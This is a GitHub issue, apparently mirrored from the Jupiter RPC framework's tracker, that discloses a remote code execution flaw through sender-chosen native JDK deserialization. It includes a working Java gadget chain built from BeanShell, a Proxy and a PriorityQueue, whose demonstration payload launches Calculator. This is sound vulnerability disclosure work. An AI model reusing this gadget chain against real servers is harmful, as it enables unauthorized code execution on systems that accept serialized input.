Giters

fengjiachun / Jupiter

Jupiter是一款性能非常不错的, 轻量级的分布式服务框架

Geek Repo:Geek Repo

Github PK Tool:Github PK Tool

Another approach capable of achieving RCE attacks

adv851 opened this issue · comments

commented

Problem Description

As Jupiter's deserialization protocol is dictated by the sender's request configuration, attackers can induce the Provider side to employ the Native JDK protocol for deserializing carefully crafted serialized data, thereby accomplishing an RCE attack.

Reproduce

Provider

We employed the built-in module "jupiter-example" of the project to set up the test environment for the attack. The JDK version used is 8u65.
截屏2023-11-02 22 54 28

POC
截屏2023-11-02 22 46 53

At line 66, change the deserialization protocol to Native JAVA, and at line 70, replace the malicious injection object (there are several known candidate injection objects, one is selected here as an example, and this chain depends on the following JAR files).

<dependency>
            <groupId>org.beanshell</groupId>
            <artifactId>bsh</artifactId>
            <version>2.0b5</version>
        </dependency>

public static Object getBshObject() throws Exception {
        // BeanShell payload

        String payload =
                "compare(Object foo, Object bar) {new java.lang.ProcessBuilder(new String[]{" +
                        Strings.join( // does not support spaces in quotes
                                Arrays.asList("open /System/Applications/Calculator.app".replaceAll("\\\\","\\\\\\\\").replaceAll("\"","\\\"").split(" ")),
                                ",", "\"", "\"") +
                        "}).start();return new Integer(1);}";

        // Create Interpreter
        Interpreter i = new Interpreter();

        // Evaluate payload
        i.eval(payload);

        // Create InvocationHandler
        XThis xt = new XThis(i.getNameSpace(), i);
        InvocationHandler handler = (InvocationHandler) Reflections.getField(xt.getClass(), "invocationHandler").get(xt);

        // Create Comparator Proxy
        Comparator comparator = (Comparator) Proxy.newProxyInstance(Comparator.class.getClassLoader(), new Class<?>[]{Comparator.class}, handler);

        // Prepare Trigger Gadget (will call Comparator.compare() during deserialization)
        final PriorityQueue<Object> priorityQueue = new PriorityQueue<Object>(2, comparator);
        Object[] queue = new Object[] {1,1};
        Reflections.setFieldValue(priorityQueue, "queue", queue);
        Reflections.setFieldValue(priorityQueue, "size", 2);

        return priorityQueue;
    }

Attack Impact

Capable of executing an RCE attack, in this attack test, it is demonstrated through the launch of the calculator application.
截屏2023-11-02 22 51 49
截屏2023-11-02 22 52 28
截屏2023-11-02 22 52 50